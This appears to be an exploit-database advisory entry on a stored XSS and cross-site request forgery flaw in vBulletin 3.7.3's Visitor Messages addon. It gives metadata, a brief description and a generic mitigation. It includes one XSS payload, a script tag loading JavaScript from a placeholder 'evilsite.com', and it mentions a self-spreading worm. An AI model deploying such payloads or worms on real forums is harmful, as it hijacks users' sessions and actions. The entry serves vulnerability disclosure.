vendor:
Visitor Messages
by:
Mx
8.8
CVSS
HIGH
XSS/XSRF
79
CWE
Product Name: Visitor Messages
Affected Version From: 3.7.2003
Affected Version To: 3.7.2003
Patch Exists: YES
Related CWE: N/A
CPE: vbulletin:vbulletin
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009
vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included with the visitor messages addon (a clone of a social network wall/comment area). When posting XSS, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee. The commenter posts a XSS vector such as <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available and an example worm is included that makes the user post a new thread with a specified subject and message.
Mitigation:
Ensure that all user-supplied input is properly sanitized and validated before being used in the application.